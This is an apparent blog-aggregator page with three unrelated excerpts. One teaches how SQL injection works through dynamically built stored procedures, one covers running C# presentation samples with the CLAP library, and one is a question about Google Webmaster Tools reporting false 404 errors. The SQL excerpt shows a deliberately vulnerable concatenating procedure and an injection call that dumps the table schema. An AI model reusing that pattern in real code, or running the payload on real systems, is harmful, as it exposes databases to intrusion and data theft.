business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

Read the article
A Simple Approach For Presenting With Code Samples

- by Jesse Taber

Originally posted on: http://geekswithblogs.net/GruffCode/archive/2013/07/31/a-simple-approach-for-presenting-with-code-samples.aspxI’ve been getting ready for a presentation and have been struggling a bit with the best way to show and execute code samples. I don’t present often (hardly ever), but when I do I like the presentation to have a lot of succinct and executable code snippets to help illustrate the points that I’m making. Depending on what the presentation is about, I might just want to build an entire sample application that I would run during the presentation. In other cases, however, building a full-blown application might not really be the best way to present the code. The presentation I’m working on now is for an open source utility library for dealing with dates and times. I could have probably cooked up a sample app for accepting date and time input and then contrived ways in which it could put the library through its paces, but I had trouble coming up with one app that would illustrate all of the various features of the library that I wanted to highlight. I finally decided that what I really needed was an approach that met the following criteria: Simple: I didn’t want the user interface or overall architecture of a sample application to serve as a distraction from the demonstration of the syntax of the library that the presentation is about. I want to be able to present small bits of code that are focused on accomplishing a single task. Several of these examples will look similar, and that’s OK. I want each sample to “stand on its own” and not rely much on external classes or methods (other than the library that is being presented, of course). “Debuggable” (not really a word, I know): I want to be able to easily run the sample with the debugger attached in Visual Studio should I want to step through any bits of code and show what certain values might be at run time. As far as I know this rules out something like LinqPad, though using LinqPad to present code samples like this is actually a very interesting idea that I might explore another time. Flexible and Selectable: I’m going to have lots of code samples to show, and I want to be able to just package them all up into a single project or module and have an easy way to just run the sample that I want on-demand. Since I’m presenting on a .NET framework library, one of the simplest ways in which I could execute some code samples would be to just create a Console application and use Console.WriteLine to output the pertinent info at run time. This gives me a “no frills” harness from which to run my code samples, and I just hit ‘F5’ to run it with the debugger. This satisfies numbers 1 and 2 from my list of criteria above, but item 3 is a little harder. By default, just running a console application is going to execute the ‘main’ method, and then terminate the program after all code is executed. If I want to have several different code samples and run them one at a time, it would be cumbersome to keep swapping the code I want in and out of the ‘main’ method of the console application. What I really want is an easy way to keep the console app running throughout the whole presentation and just have it run the samples I want when I want. I could setup a simple Windows Forms or WPF desktop application with buttons for the different samples, but then I’m getting away from my first criteria of keeping things as simple as possible. Infinite Loops To The Rescue I found a way to have a simple console application satisfy all three of my requirements above, and it involves using an infinite loop and some Console.ReadLine calls that will give the user an opportunity to break out and exit the program. (All programs that need to run until they are closed explicitly (or crash!) likely use similar constructs behind the scenes. Create a new Windows Forms project, look in the ‘Program.cs’ that gets generated, and then check out the docs for the Application.Run method that it calls.). Here’s how the main method might look: 1: static void Main(string[] args) 2: { 3: do 4: { 5: Console.Write("Enter command or 'exit' to quit: > "); 6: var command = Console.ReadLine(); 7: if ((command ?? string.Empty).Equals("exit", StringComparison.OrdinalIgnoreCase)) 8: { 9: Console.WriteLine("Quitting."); 10: break; 11: } 12: 13: } while (true); 14: } The idea here is the app prompts me for the command I want to run, or I can type in ‘exit’ to break out of the loop and let the application close. The only trick now is to create a set of commands that map to each of the code samples that I’m going to want to run. Each sample is already encapsulated in a single public method in a separate class, so I could just write a big switch statement or create a hashtable/dictionary that maps command text to an Action that will invoke the proper method, but why re-invent the wheel? CLAP For Your Own Presentation I’ve blogged about the CLAP library before, and it turns out that it’s a great fit for satisfying criteria #3 from my list above. CLAP lets you decorate methods in a class with an attribute and then easily invoke those methods from within a console application. CLAP was designed to take the arguments passed into the console app from the command line and parse them to determine which method to run and what arguments to pass to that method, but there’s no reason you can’t re-purpose it to accept command input from within the infinite loop defined above and invoke the corresponding method. Here’s how you might define a couple of different methods to contain two different code samples that you want to run during your presentation: 1: public static class CodeSamples 2: { 3: [Verb(Aliases="one")] 4: public static void SampleOne() 5: { 6: Console.WriteLine("This is sample 1"); 7: } 8: 9: [Verb(Aliases="two")] 10: public static void SampleTwo() 11: { 12: Console.WriteLine("This is sample 2"); 13: } 14: } A couple of things to note about the sample above: I’m using static methods. You don’t actually need to use static methods with CLAP, but the syntax ends up being a bit simpler and static methods happen to lend themselves well to the “one self-contained method per code sample” approach that I want to use. The methods are decorated with a ‘Verb’ attribute. This tells CLAP that they are eligible targets for commands. The “Aliases” argument lets me give them short and easy-to-remember aliases that can be used to invoke them. By default, CLAP just uses the full method name as the command name, but with aliases you can simply the usage a bit. I’m not using any parameters. CLAP’s main feature is its ability to parse out arguments from a command line invocation of a console application and automatically pass them in as parameters to the target methods. My code samples don’t need parameters ,and honestly having them would complicate giving the presentation, so this is a good thing. You could use this same approach to invoke methods with parameters, but you’d have a couple of things to figure out. When you invoke a .NET application from the command line, Windows will parse the arguments and pass them in as a string array (called ‘args’ in the boilerplate console project Program.cs). The parsing that gets done here is smart enough to deal with things like treating strings in double quotes as one argument, and you’d have to re-create that within your infinite loop if you wanted to use parameters. I plan on either submitting a pull request to CLAP to add this capability or maybe just making a small utility class/extension method to do it and posting that here in the future. So I now have a simple class with static methods to contain my code samples, and an infinite loop in my ‘main’ method that can accept text commands. Wiring this all up together is pretty easy: 1: static void Main(string[] args) 2: { 3: do 4: { 5: try 6: { 7: Console.Write("Enter command or 'exit' to quit: > "); 8: var command = Console.ReadLine(); 9: if ((command ?? string.Empty).Equals("exit", StringComparison.OrdinalIgnoreCase)) 10: { 11: Console.WriteLine("Quitting."); 12: break; 13: } 14: 15: Parser.Run<CodeSamples>(new[] { command }); 16: Console.WriteLine("---------------------------------------------------------"); 17: } 18: catch (Exception ex) 19: { 20: Console.Error.WriteLine("Error: " + ex.Message); 21: } 22: 23: } while (true); 24: } Note that I’m now passing the ‘CodeSamples’ class into the CLAP ‘Parser.Run’ as a type argument. This tells CLAP to inspect that class for methods that might be able to handle the commands passed in. I’m also throwing in a little “----“ style line separator and some basic error handling (because I happen to know that some of the samples are going to throw exceptions for demonstration purposes) and I’m good to go. Now during my presentation I can just have the console application running the whole time with the debugger attached and just type in the alias of the code sample method that I want to run when I want to run it.

Read the article
Google Webmaster Tools reports fake 404 errors

- by Edgar Quintero

I have a website where Google Webmaster Tools reports 15,000 links as 404 errors. However, all links return a 200 when I visit them. The problem is, that eventhough I can visit these pages and return a 200, all those 15,000 pages won't index in Google. They aren't appearing in search results. These are constant errors Google Webmaster Tools keeps reporting and I'm not sure what the problem is. We've thought of a DNS issue, but it shouldn't be a DNS issue, because if it were, no page would be indexed (I have 10,000 perfectly indexed). Regarding URL parameters, my pages do not share a similarity in URL parameters that can make it obvious to me what could be causing the error.

Read the article

< Previous Page | 81 82 83 84 85 86 87 88 89 90 91 92 | Next Page >